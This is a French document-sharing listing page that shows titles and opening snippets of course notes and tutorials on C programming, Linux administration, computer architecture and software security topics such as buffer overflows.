Le langage C++ est un langage de programmation puissant, polyvalent, on serait presque tenté de dire universel, massivement utilisé dans l'industrie Chapitre I : Les bases du C++ Le langage C++ est un langage de programmation puissant, polyvalent, on serait presque tenté de dire universel, massivement utilisé dans l'industrie du logiciel, et ce depuis

Plus en détail

Initiation à la sécurité

Initiation à la sécurité Initiation à la sécurité UE Systèmes informatiques 12 septembre 2011 Julien Raeis - http://raeis.iiens.net/ Présentation Ingénieur IIE 2005 Carrière dans la sécurité des systèmes Consultant en sécurité

Plus en détail

Introduction aux buffer overflow, CS335

Introduction aux buffer overflow, CS335 Introduction aux buffer overflow, CS335 http ://www.phrack.org/archives/49/p49-14 1. Smashing the stack for fun and profit by Aleph One November 1996 Aleph1 United Kingdom : www.aleph1.co.uk Mail : aleph1@securityfocus.com

Plus en détail

INFO-F-404 : Techniques avancées de systèmes d exploitation

INFO-F-404 : Techniques avancées de systèmes d exploitation Nikita Veshchikov e-mail : nikita.veshchikov@ulb.ac.be téléphone : 02/650.58.56 bureau : 2N8.213 URL : http://student.ulb.ac.be/~nveshchi/ INFO-F-404 : Techniques avancées de systèmes d exploitation Table

Plus en détail

Conventions d écriture et outils de mise au point

Conventions d écriture et outils de mise au point Logiciel de base Première année par alternance Responsable : Christophe Rippert Christophe.Rippert@Grenoble-INP.fr Introduction Conventions d écriture et outils de mise au point On va utiliser dans cette

Plus en détail

Programmation C. Apprendre à développer des programmes simples dans le langage C

Programmation C. Apprendre à développer des programmes simples dans le langage C Programmation C Apprendre à développer des programmes simples dans le langage C Notes de cours sont disponibles sur http://astro.u-strasbg.fr/scyon/stusm (attention les majuscules sont importantes) Modalités

Plus en détail

Programmation système I Les entrées/sorties

Programmation système I Les entrées/sorties Programmation système I Les entrées/sorties DUT 1 re année Université de Marne La vallée Les entrées-sorties : E/O Entrées/Sorties : Opérations d échanges d informations dans un système informatique. Les

Plus en détail

Algorithmique et Programmation, IMA

Algorithmique et Programmation, IMA Algorithmique et Programmation, IMA Cours 2 : C Premier Niveau / Algorithmique Université Lille 1 - Polytech Lille Notations, identificateurs Variables et Types de base Expressions Constantes Instructions

Plus en détail

Playing with ptrace() for fun and profit

Playing with ptrace() for fun and profit sous GNU/Linux nicolas.bareil@eads.net EADS Corporate Research Center - DCR/STI/C SSI Lab SSTIC 2006 Il était une fois... Sous UNIX, ptrace() est le seul moyen de debuggage. User-space, Interface rigide

Plus en détail

Les vulnérabilités du noyau. LECORNET Olivier LEGROS Bruno VIGIER Nicolas Promo 2005

Les vulnérabilités du noyau. LECORNET Olivier LEGROS Bruno VIGIER Nicolas Promo 2005 Les vulnérabilités du noyau LECORNET Olivier LEGROS Bruno VIGIER Nicolas Promo 2005 27 Septembre 2003 Table des matières 1 Introduction 3 2 Fonctionnement du noyau 4 2.1 Les modes de fonctionnements............................

Plus en détail

1. Structure d un programme C. 2. Commentaire: /*..texte */ On utilise aussi le commentaire du C++ qui est valable pour C: 3.

1. Structure d un programme C. 2. Commentaire: /*..texte */ On utilise aussi le commentaire du C++ qui est valable pour C: 3. 1. Structure d un programme C Un programme est un ensemble de fonctions. La fonction "main" constitue le point d entrée pour l exécution. Un exemple simple : #include int main() { printf ( this

Plus en détail

Bases de programmation. Cours 5. Structurer les données

Bases de programmation. Cours 5. Structurer les données Bases de programmation. Cours 5. Structurer les données Pierre Boudes 1 er décembre 2014 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License. Types char et

Plus en détail

Les attaques par corruption de mémoire Synopsis Mickael Deloison 22/10/2008

Les attaques par corruption de mémoire Synopsis Mickael Deloison 22/10/2008 Les attaques par corruption de mémoire Synopsis Ce document traite des failles permettant des attaques par corruption de mémoire, les attaques par buffer overflow (dépassement de buffer) étant les plus

Plus en détail

Le prototype de la fonction main()

Le prototype de la fonction main() Le prototype de la fonction main() 1. Introduction...1 2. Paramètres et type de retour de la fonction main()...1 3. Exemple 1...2 4. La fonction exit() du C...2 5. Détecter le code de retour d un programme

Plus en détail

Machines virtuelles. Brique ASC. Samuel Tardieu sam@rfc1149.net. Samuel Tardieu (ENST) Machines virtuelles 1 / 40

Machines virtuelles. Brique ASC. Samuel Tardieu sam@rfc1149.net. Samuel Tardieu (ENST) Machines virtuelles 1 / 40 Machines virtuelles Brique ASC Samuel Tardieu sam@rfc1149.net École Nationale Supérieure des Télécommunications Samuel Tardieu (ENST) Machines virtuelles 1 / 40 Machines virtuelles La compilation peut

Plus en détail

Quelques éléments de compilation en C et makefiles

Quelques éléments de compilation en C et makefiles Quelques éléments de compilation en C et makefiles Guillaume Feuillade 1 Compiler un programme C Le principe de la compilation consiste à passer d un ensemble de fichiers de code à un programme exécutable

Plus en détail

Cours d Algorithmique-Programmation 2 e partie (IAP2): programmation 24 octobre 2007impérative 1 / 44 et. structures de données simples

Cours d Algorithmique-Programmation 2 e partie (IAP2): programmation 24 octobre 2007impérative 1 / 44 et. structures de données simples Cours d Algorithmique-Programmation 2 e partie (IAP2): programmation impérative et structures de données simples Introduction au langage C Sandrine Blazy - 1ère année 24 octobre 2007 Cours d Algorithmique-Programmation

Plus en détail

Débogage de code* Mardi 13 décembre 2011. Romaric DAVID david@unistra.fr Université de Strasbourg - Direction Informatique Pôle HPC. hpc.unistra.

Débogage de code* Mardi 13 décembre 2011. Romaric DAVID david@unistra.fr Université de Strasbourg - Direction Informatique Pôle HPC. hpc.unistra. Débogage de code* Mardi 13 décembre 2011 Romaric DAVID david@unistra.fr Université de Strasbourg - Direction Informatique Pôle HPC *ou l'art de chercher la petite bête Plan Introduction Débogage, quelques

Plus en détail

1) Installation de Dev-C++ Téléchargez le fichier devcpp4990setup.exe dans un répertoire de votre PC, puis double-cliquez dessus :

1) Installation de Dev-C++ Téléchargez le fichier devcpp4990setup.exe dans un répertoire de votre PC, puis double-cliquez dessus : 1) Installation de Dev-C++ Téléchargez le fichier devcpp4990setup.exe dans un répertoire de votre PC, puis double-cliquez dessus : La procédure d installation démarre. La fenêtre suivante vous indique

Plus en détail

Serveur Linux : FTP. Mise en place d un service FTP sous Linux. Bouron Dimitri 20/04/2014

Serveur Linux : FTP. Mise en place d un service FTP sous Linux. Bouron Dimitri 20/04/2014 Mise en place d un service FTP sous Linux Bouron Dimitri 20/04/2014 Ce document sert de démonstration concise pour l installation, la configuration, la sécurisation, d un serveur FTP sous Linux utilisant

Plus en détail

Architecture des ordinateurs

Architecture des ordinateurs Architecture des ordinateurs Cours 4 5 novembre 2012 Archi 1/22 Micro-architecture Archi 2/22 Intro Comment assembler les différents circuits vus dans les cours précédents pour fabriquer un processeur?

Plus en détail

Configurer la supervision pour une base MS SQL Server Viadéis Services

Configurer la supervision pour une base MS SQL Server Viadéis Services Configurer la supervision pour une base MS SQL Server Référence : 11588 Version N : 2.2 : Créé par : Téléphone : 0811 656 002 Sommaire 1. Création utilisateur MS SQL Server... 3 2. Configuration de l accès

Plus en détail

Le Projet BINSEC. Automatiser l analyse de sécurité au niveau binaire. Airbus group, CEA, IRISA, LORIA, Uni. Joseph Fourier. p.

Le Projet BINSEC. Automatiser l analyse de sécurité au niveau binaire. Airbus group, CEA, IRISA, LORIA, Uni. Joseph Fourier. p. Le Projet BINSEC Automatiser l analyse de sécurité au niveau binaire Airbus group, CEA, IRISA, LORIA, Uni. Joseph Fourier p. 1/22 Introduction Panorama de BINSEC Cadre de travail Projet ANR INS, appel

Plus en détail

LINUX REMPLAÇANT WINDOWS NT

LINUX REMPLAÇANT WINDOWS NT 189 Cette installation fonctionne chez moi à Veyre. Vous pouvez consulter et télécharger les fichiers à : http://perso.wanadoo.fr/gerard.blanchet/ veyre/ Mais c'est tout à fait adapté à un établissement

Plus en détail

Programmation système en C/C++

Programmation système en C/C++ Programmation système en C/C++ Jean-Baptiste Vioix (jb.vioix@free.fr) LE2I - ENESAD http://jb.vioix.free.fr 1-41 Programmation en C/C++ sous Unix Il existe des très nombreux outils de développement sous

Plus en détail

Mon premier rpm. http://alexandre-mesle.com 7 juin 2010. 1 Avant de commencer 2 1.1 RPM... 2 1.2 URPMI... 2 1.3 RPMBUILD... 2

Mon premier rpm. http://alexandre-mesle.com 7 juin 2010. 1 Avant de commencer 2 1.1 RPM... 2 1.2 URPMI... 2 1.3 RPMBUILD... 2 Mon premier rpm http://alexandre-mesle.com 7 juin 2010 Table des matières 1 Avant de commencer 2 1.1 RPM....................................................... 2 1.2 URPMI.....................................................

Plus en détail

Seance 2: En respectant la méthode de programmation par contrat, implémentez les autres fonctions de jeu.

Seance 2: En respectant la méthode de programmation par contrat, implémentez les autres fonctions de jeu. Seance 2: Complétion du code de jeu. (durée max: 2h) Mot clé const et pointeurs: En respectant la méthode de programmation par contrat, implémentez les autres fonctions de jeu. Implémentez jeu_recupere_piece

Plus en détail

Introduction...3. Objectif...3. Manipulations...3. Gestion des utilisateurs et des groupes...4. Introduction...4. Les fichiers de base...

Introduction...3. Objectif...3. Manipulations...3. Gestion des utilisateurs et des groupes...4. Introduction...4. Les fichiers de base... Système d'exploitation Sommaire Introduction...3 Objectif...3 Manipulations...3 Gestion des utilisateurs et des groupes...4 Introduction...4 Les fichiers de base...4 Quelques commandes d'administration...5

Plus en détail

La mémoire. Un ordinateur. L'octet. Le bit

La mémoire. Un ordinateur. L'octet. Le bit Introduction à l informatique et à la programmation Un ordinateur Un ordinateur est une machine à calculer composée de : un processeur (ou unité centrale) qui effectue les calculs une mémoire qui conserve

Plus en détail

ACTIVITÉ DE PROGRAMMATION

ACTIVITÉ DE PROGRAMMATION ACTIVITÉ DE PROGRAMMATION The purpose of the Implementation Process is to realize a specified system element. ISO/IEC 12207 Sébastien Adam Une introduction 2 Introduction Ø Contenu Utilité de l ordinateur,

Plus en détail

3IS - Système d'exploitation linux - Programmation système

3IS - Système d'exploitation linux - Programmation système 3IS - Système d'exploitation linux - Programmation système 2010 David Picard Contributions de : Arnaud Revel, Mickaël Maillard picard@ensea.fr Environnement Les programmes peuvent être exécutés dans des

Plus en détail

Cours de C. Petits secrets du C & programmation avancée. Sébastien Paumier

Cours de C. Petits secrets du C & programmation avancée. Sébastien Paumier Cours de C Petits secrets du C & programmation avancée Sébastien Paumier paumier@univ-mlv.fr Illustrations provenant du site http://tux.crystalxp.net/ 1 Affectations étendues a+=expression a=a+expression

Plus en détail

Le langage C. Séance n 4

Le langage C. Séance n 4 Université Paris-Sud 11 Institut de Formation des Ingénieurs Remise à niveau INFORMATIQUE Année 2007-2008 Travaux pratiques d informatique Le langage C Séance n 4 But : Vous devez maîtriser à la fin de

Plus en détail

WDpStats Procédure d installation

WDpStats Procédure d installation WDpStats Procédure d installation Table de matières WDpStats... 1 Procédure d installation... 1 Table de matières... 1 Résumé... 2 Réquisits... 2 Installation... 2 Difficultés... 6 Lancement... 7 wdpstats_install_oracle_fr.xml

Plus en détail

Installation de VirtualPOPC-1 sur Ubuntu Server 10.04 LTS 64bits

Installation de VirtualPOPC-1 sur Ubuntu Server 10.04 LTS 64bits Titre Propriétaire Classification Date dernière modification Chemin et NomFichier Installation de VirtualPOPC-1 sur Ubuntu Server 10.04 LTS 64bits Penas Cédric Privé 19.09.10 \\10.1.1.1\FilesTD\Group4\Personnel\Penas\ViSaG\Installation_VirtualP

Plus en détail

Programmation système de commandes en C

Programmation système de commandes en C Programmation système de commandes en C Cours de Programmation système Tuyêt Trâm DANG NGOC Université de Cergy-Pontoise 2012 2013 Tuyêt Trâm DANG NGOC Programmation système de commandes

Plus en détail

Outils pour la pratique

Outils pour la pratique Cinquième partie Outils pour la pratique 121 CHAPITRE 1 Les bases des séances de TP Avant de lire cettre section, il est suggéré de relire vos notes de cours se rapportant au système d exploitation Unix.

Plus en détail

Introduction au langage C

Introduction au langage C Introduction au langage C Cours 1: Opérations de base et premier programme Alexis Lechervy Alexis Lechervy (UNICAEN) Introduction au langage C 1 / 23 Les premiers pas Sommaire 1 Les premiers pas 2 Les

Plus en détail

Microsoft OSQL OSQL ou l'outil de base pour gérer SQL Server

Microsoft OSQL OSQL ou l'outil de base pour gérer SQL Server Microsoft OSQL OSQL ou l'outil de base pour gérer SQL Server Suite à mon précédent article concernant MSDE, je me suis rendu compte à partir des commentaires que de nombreux utilisateurs avaient des problèmes

Plus en détail

TP 1. Prise en main du langage Python

TP 1. Prise en main du langage Python TP. Prise en main du langage Python Cette année nous travaillerons avec le langage Python version 3. ; nous utiliserons l environnement de développement IDLE. Étape 0. Dans votre espace personnel, créer

Plus en détail

Olivier Mondet http://unidentified-one.net

Olivier Mondet http://unidentified-one.net T-GSI Ch.4 Le Langage SQL LDD, LCD Cet exercice guidé reprend le plan suivis lors de l intervention de formation faite pour l académie de Versailles. L objectif principal visait en la présentation du langage

Plus en détail

Compilation (INF 564)

Compilation (INF 564) Présentation du cours Le processeur MIPS Programmation du MIPS 1 Compilation (INF 564) Introduction & architecture MIPS François Pottier 10 décembre 2014 Présentation du cours Le processeur MIPS Programmation

Plus en détail

Tutoriel code::blocks

Tutoriel code::blocks Tutoriel code::blocks E. Lunéville 2006 Le logiciel code::blocks fait partie des logiciels de type EDI (Environnement de Développement Intégré, IDE en anglais) pour le langage C++. Il est multiplateforme

Plus en détail

Table des matières. 1. Installation de VMware ESXI 4... 3. 1.1. Pré-requis... 3. 1.2. Installation... 3

Table des matières. 1. Installation de VMware ESXI 4... 3. 1.1. Pré-requis... 3. 1.2. Installation... 3 Table des matières 1. Installation de VMware ESXI 4.... 3 1.1. Pré-requis... 3 1.2. Installation... 3 1.2.1. Panneau de configuration du serveur ESXI... 4 1.2.2. Configuration du mot de passe «Root»....

Plus en détail

Licence ST Université Claude Bernard Lyon I LIF1 : Algorithmique et Programmation C Bases du langage C 1 Conclusion de la dernière fois Introduction de l algorithmique générale pour permettre de traiter

Plus en détail

Compression de Données - Algorithme de Huffman Document de Conception

Compression de Données - Algorithme de Huffman Document de Conception ROLLET Samuel SALLE Jennifer Compression de Données - Algorithme de Huffman Document de Conception Projet d'algorithmique et Structure des Données 1 SOMMAIRE 1. Domaine d application....4 1.1 Objectifs

Plus en détail

INTRODUCTION A JAVA. Fichier en langage machine Exécutable

INTRODUCTION A JAVA. Fichier en langage machine Exécutable INTRODUCTION A JAVA JAVA est un langage orienté-objet pur. Il ressemble beaucoup à C++ au niveau de la syntaxe. En revanche, ces deux langages sont très différents dans leur structure (organisation du

Plus en détail

Architecture des ordinateurs. Loïc Cuvillon. 20 novembre 2013

Architecture des ordinateurs. Loïc Cuvillon. 20 novembre 2013 Systèmes temps réel et systèmes embarqués Architecture des ordinateurs Loïc Cuvillon Ecole Nationale Supérieure de Physique de Strasbourg 20 novembre 2013 Loïc Cuvillon (ENSPS) Systèmes temps réel et systèmes

Plus en détail

Tutoriel Création d une source Cydia et compilation des packages sous Linux

Tutoriel Création d une source Cydia et compilation des packages sous Linux Tutoriel Création d une source Cydia et compilation des packages sous Linux 1. Pré-requis 1. Quelques connaissances sous Linux 2. Avoir à disposition un Serveur FTP pour héberger votre source 3. Un thème

Plus en détail

TD/TP 1 Introduction au SDK d Android

TD/TP 1 Introduction au SDK d Android TD/TP 1 Introduction au SDK d Android Romain Raveaux 1 Introduction Android est un système d'exploitation pour téléphone portable de nouvelle génération développé par Google. Celui-ci met à disposition

Plus en détail

DU BINAIRE AU MICROPROCESSEUR - D ANGELIS CIRCUITS CONFIGURABLES NOTION DE PROGRAMMATION

DU BINAIRE AU MICROPROCESSEUR - D ANGELIS CIRCUITS CONFIGURABLES NOTION DE PROGRAMMATION 145 NOTION DE PROGRAMMATION 1/ Complétons notre microprocesseur Nous avons, dans les leçons précédentes décrit un microprocesseur théorique, cependant il s inspire du 6800, premier microprocesseur conçu

Plus en détail

Guide pour l Installation des Disques Durs SATA et Configuration RAID

Guide pour l Installation des Disques Durs SATA et Configuration RAID Guide pour l Installation des Disques Durs SATA et Configuration RAID 1. Guide pour l Installation des Disques Durs SATA.. 2 1.1 Installation de disques durs Série ATA (SATA).. 2 1.2 Créer une disquette

Plus en détail

Assembleur. Faculté I&C, André Maurer, Claude Petitpierre

Assembleur. Faculté I&C, André Maurer, Claude Petitpierre Assembleur Faculté I&C, André Maurer, Claude Petitpierre INTRODUCTION Logiciel utilisé Faculté I&C, André Maurer, Claude Petitpierre MEMOIRE Mémoire Faculté I&C, André Maurer, Claude Petitpierre Mémoire

Plus en détail

Rappels d architecture

Rappels d architecture Assembleur Rappels d architecture Un ordinateur se compose principalement d un processeur, de mémoire. On y attache ensuite des périphériques, mais ils sont optionnels. données : disque dur, etc entrée

Plus en détail

DNS Server RPC Interface buffer overflow. Céline COLLUMEAU Nicolas BODIN

DNS Server RPC Interface buffer overflow. Céline COLLUMEAU Nicolas BODIN Mémoire DNS Server RPC Interface buffer overflow Céline COLLUMEAU Nicolas BODIN 3 janvier 2009 Table des matières 1 Introduction 2 2 Présentation de la faille 3 3 Exemple d exploitation 5 4 Solutions 10

Plus en détail

Éléments d informatique Cours 3 La programmation structurée en langage C L instruction de contrôle if

Éléments d informatique Cours 3 La programmation structurée en langage C L instruction de contrôle if Éléments d informatique Cours 3 La programmation structurée en langage C L instruction de contrôle if Pierre Boudes 28 septembre 2011 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike

Plus en détail

Les différentes méthodes pour se connecter

Les différentes méthodes pour se connecter Les différentes méthodes pour se connecter Il y a plusieurs méthodes pour se connecter à l environnement vsphere 4 : en connexion locale sur le serveur ESX ; avec vsphere Client pour une connexion sur

Plus en détail

Architecture des ordinateurs TD1 - Portes logiques et premiers circuits

Architecture des ordinateurs TD1 - Portes logiques et premiers circuits Architecture des ordinateurs TD1 - Portes logiques et premiers circuits 1 Rappel : un peu de logique Exercice 1.1 Remplir la table de vérité suivante : a b a + b ab a + b ab a b 0 0 0 1 1 0 1 1 Exercice

Plus en détail

Atelier La notion de session utilisateur sous Linux

Atelier La notion de session utilisateur sous Linux Chapitre 6 Atelier La notion de session utilisateur sous Linux I Présentation Nous allons voir la notion de session et d utilisateur sous linux, ainsi que quelques commandes de base afin de mieux comprendre

Plus en détail

Skype (v2.5) Protocol Data Structures (French) Author : Ouanilo MEDEGAN http://www.oklabs.net

Skype (v2.5) Protocol Data Structures (French) Author : Ouanilo MEDEGAN http://www.oklabs.net Skype (v2.5) Protocol Data Structures (French) Author : Ouanilo MEDEGAN http://www.oklabs.net : Champ Encodé SKWRITTEN() : Champ Variable défini Précédemment & définissant l état des champs à suivre ECT

Plus en détail

IN 102 - Cours 1. 1 Informatique, calculateurs. 2 Un premier programme en C

IN 102 - Cours 1. 1 Informatique, calculateurs. 2 Un premier programme en C IN 102 - Cours 1 Qu on le veuille ou non, les systèmes informatisés sont désormais omniprésents. Même si ne vous destinez pas à l informatique, vous avez de très grandes chances d y être confrontés en

Plus en détail

ERESI : une plate-forme d analyse binaire au niveau noyau

ERESI : une plate-forme d analyse binaire au niveau noyau ERESI : une plate-forme d analyse binaire au niveau noyau Anthony Desnos, Sebastien Roy, and Julien Vanegue The ERESI Team team@eresi-project.org Résumé ERESI est une interface pour l analyse de code machine

Plus en détail

DE L ALGORITHME AU PROGRAMME INTRO AU LANGAGE C 51

DE L ALGORITHME AU PROGRAMME INTRO AU LANGAGE C 51 DE L ALGORITHME AU PROGRAMME INTRO AU LANGAGE C 51 PLAN DU COURS Introduction au langage C Notions de compilation Variables, types, constantes, tableaux, opérateurs Entrées sorties de base Structures de

Plus en détail

1-Introduction 2. 2-Installation de JBPM 3. 2-JBPM en action.7

1-Introduction 2. 2-Installation de JBPM 3. 2-JBPM en action.7 Sommaire 1-Introduction 2 1-1- BPM (Business Process Management)..2 1-2 J-Boss JBPM 2 2-Installation de JBPM 3 2-1 Architecture de JOBSS JBPM 3 2-2 Installation du moteur JBoss JBPM et le serveur d application

Plus en détail

Qlik Sense Desktop. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Tous droits réservés.

Qlik Sense Desktop. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Tous droits réservés. Qlik Sense Desktop Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Tous droits réservés. Copyright 1993-2015 QlikTech International AB. Tous droits réservés. Qlik, QlikTech, Qlik Sense,

Plus en détail

TP1 - Prise en main de l environnement Unix.

TP1 - Prise en main de l environnement Unix. Mise à niveau UNIX Licence Bio-informatique TP1 - Prise en main de l environnement Unix. Les sujets de TP sont disponibles à l adresse http://www.pps.jussieu.fr/~tasson/enseignement/bioinfo/ Les documents

Plus en détail

Prérequis. Résolution des problèmes WMI. Date 03/30/2010 Version 1.0 Référence 001 Auteur Antoine CRUE

Prérequis. Résolution des problèmes WMI. Date 03/30/2010 Version 1.0 Référence 001 Auteur Antoine CRUE Prérequis Résolution des problèmes WMI Date 03/30/2010 Version 1.0 Référence 001 Auteur Antoine CRUE VOS CONTACTS TECHNIQUES JEAN-PHILIPPE SENCKEISEN ANTOINE CRUE LIGNE DIRECTE : 01 34 93 35 35 EMAIL :

Plus en détail

Systèmes d Exploitation & Machines Virtuelles. Format de l enseignement. Objectif du cours

Systèmes d Exploitation & Machines Virtuelles. Format de l enseignement. Objectif du cours Systèmes d Exploitation & Machines Virtuelles Architectures et Conception des logicielles de base pour les systèmes informatiques Par Gilles Grimaud Université des Sciences et Technologies de Lille http://www.lifl.fr/~grimaud/cours

Plus en détail

Anas Abou El Kalam Sécurité SSH SSH

Anas Abou El Kalam Sécurité SSH SSH SSH 1 Introduction La possibilité de travailler.à distance. a toujours été une fonctionnalité très appréciée des utilisateurs de machines UNIX. Cela est traditionnellement possible suivant plusieurs modes

Plus en détail

Solutions informatiques

Solutions informatiques Solutions informatiques Procédure Sur Comment créer un Script d ouverture de session Windows avec lecteur réseau par GPO Historique du document Revision Date Modification Autor 1 2013-10-03 Creation Daniel

Plus en détail

Exercice sur les Dockers

Exercice sur les Dockers Exercice sur les Dockers Les parties composant les Dockers: 1 docker daemon: est un démon qui gère les dockers (les conteneurs LXC) qui tournent sur la machine hôte 2 docker CLI: une série de commandes

Plus en détail

Ordinateurs, Structure et Applications

Ordinateurs, Structure et Applications Ordinateurs, Structure et Applications Cours 10, Les interruptions Etienne Tremblay Université Laval, Hiver 2012 Cours 10, p.1 Les interruptions du 8086 Une interruption interrompt l exécution séquentielle

Plus en détail

Contraintes, particularités. 1. Généralités... 2. 2. Gestion de la mémoire... 2. a. Type des variables et constantes... 2

Contraintes, particularités. 1. Généralités... 2. 2. Gestion de la mémoire... 2. a. Type des variables et constantes... 2 C Embarque Contraintes, particularités 1. Généralités... 2 2. Gestion de la mémoire... 2 a. Type des variables et constantes.... 2 b. Variables locales ou globales... 3 3. Interruptions... 5 4. Imposer

Plus en détail

Archivage Messagerie Evolution pour usage HTML en utilisant Hypermail

Archivage Messagerie Evolution pour usage HTML en utilisant Hypermail Finalités Archivage Messagerie Evolution pour usage HTML en utilisant Hypermail Réalisé par sa modestie Arnaud de VILLEDON de NAIDE, le 9 mars 2013 Document sous licence GPL. Vous avez le droit d'en faire

Plus en détail

Présentation du langage et premières fonctions

Présentation du langage et premières fonctions 1 Présentation de l interface logicielle Si les langages de haut niveau sont nombreux, nous allons travaillé cette année avec le langage Python, un langage de programmation très en vue sur internet en

Plus en détail

lundi 3 août 2009 Choose your language What is Document Connection for Mac? Communautés Numériques L informatique à la portée du Grand Public

lundi 3 août 2009 Choose your language What is Document Connection for Mac? Communautés Numériques L informatique à la portée du Grand Public Communautés Numériques L informatique à la portée du Grand Public Initiation et perfectionnement à l utilisation de la micro-informatique Microsoft Document Connection pour Mac. Microsoft Document Connection

Plus en détail

Documentation SecurBdF

Documentation SecurBdF Documentation SecurBdF SECURBDF V2 Protocole de sécurité de la Banque de France SecurBdF V2 DIRECTION DE L'INFORMATIQUE ET DES TÉLÉCOMMUNICATIONS Sommaire I 1 Contexte... 1 2 Références... 1 3 Cadre...

Plus en détail

TP LINUX : MISE EN PLACE DU SERVEUR DE MESSAGERIE QMAIL

TP LINUX : MISE EN PLACE DU SERVEUR DE MESSAGERIE QMAIL TP LINUX : MISE EN PLACE DU SERVEUR DE MESSAGERIE QMAIL Au cours de ce TP, vous allez installer un serveur de courrier sur un réseau local. Les étapes par lesquelles vous allez passer sont les suivantes

Plus en détail

Comment Accéder à des Bases de Données MySQL avec Windows lorqu'elles sont sur un Serveur Linux

Comment Accéder à des Bases de Données MySQL avec Windows lorqu'elles sont sur un Serveur Linux Comment Accéder à des Bases de Données MySQL avec Windows lorqu'elles sont sur un Serveur Linux Distribué par Le Projet Documentation d'openoffice.org Table of Contents 1) Préambule...3 2) Télécharger

Plus en détail

TP LINUX : LINUX-SAMBA SERVEUR DE FICHIERS POUR UTILISATEURS WINDOWS

TP LINUX : LINUX-SAMBA SERVEUR DE FICHIERS POUR UTILISATEURS WINDOWS TP LINUX : LINUX-SAMBA SERVEUR DE FICHIERS POUR UTILISATEURS WINDOWS I LA MISSION Votre entreprise cherche maintenant à réduire le coût des licences. Elle vous confie la mission qui consiste à tester différents

Plus en détail

IceWarp serveur sur Linux : Guide d'installation

IceWarp serveur sur Linux : Guide d'installation Le Serveur IceWarp IceWarp serveur sur Linux : Guide d'installation Icewarp Mail Serveur Version 9.4 mars 2009 Icewarp France / DARNIS Informatique i Sommaire IceWarp Serveur sur Linux: Guide d'installation

Plus en détail

Micro-ordinateurs, informations, idées, trucs et astuces utiliser le Bureau à distance

Micro-ordinateurs, informations, idées, trucs et astuces utiliser le Bureau à distance Micro-ordinateurs, informations, idées, trucs et astuces utiliser le Bureau à distance Auteur : François CHAUSSON Date : 8 février 2008 Référence : utiliser le Bureau a distance.doc Préambule Voici quelques

Plus en détail

INITIATION AU LANGAGE C SUR PIC DE MICROSHIP

INITIATION AU LANGAGE C SUR PIC DE MICROSHIP COURS PROGRAMMATION INITIATION AU LANGAGE C SUR MICROCONTROLEUR PIC page 1 / 7 INITIATION AU LANGAGE C SUR PIC DE MICROSHIP I. Historique du langage C 1972 : naissance du C dans les laboratoires BELL par

Plus en détail

HAUTE DISPONIBILITÉ DE MACHINE VIRTUELLE AVEC HYPER-V 2012 R2 PARTIE CONFIGURATION OPENVPN SUR PFSENSE

HAUTE DISPONIBILITÉ DE MACHINE VIRTUELLE AVEC HYPER-V 2012 R2 PARTIE CONFIGURATION OPENVPN SUR PFSENSE HAUTE DISPONIBILITÉ DE MACHINE VIRTUELLE AVEC HYPER-V 2012 R2 PARTIE CONFIGURATION OPENVPN SUR PFSENSE Projet de semestre ITI soir 4ème année Résumé configuration OpenVpn sur pfsense 2.1 Etudiant :Tarek

Plus en détail

Programme awk------introduction rapide

Programme awk------introduction rapide Programme awk------introduction rapide Introduction Historique Le nom de awk vient de ses trois concepteurs : Alfred V. Aho, Peter J. Weinberger et Brian W. Kernighan. La version originale fut créée en

Plus en détail

sshgate Patrick Guiran Chef de projet support pguiran@linagora.com WWW.LINAGORA.COM

sshgate Patrick Guiran Chef de projet support pguiran@linagora.com WWW.LINAGORA.COM sshgate Patrick Guiran Chef de projet support pguiran@linagora.com WWW.LINAGORA.COM Sommaire 1. Problématique des accès aux serveurs Besoins Linagora Recherche d'une solution 2. Présentation de sshgate

Plus en détail

WEB page builder and server for SCADA applications usable from a WEB navigator

WEB page builder and server for SCADA applications usable from a WEB navigator Générateur de pages WEB et serveur pour supervision accessible à partir d un navigateur WEB WEB page builder and server for SCADA applications usable from a WEB navigator opyright 2007 IRAI Manual Manuel

Plus en détail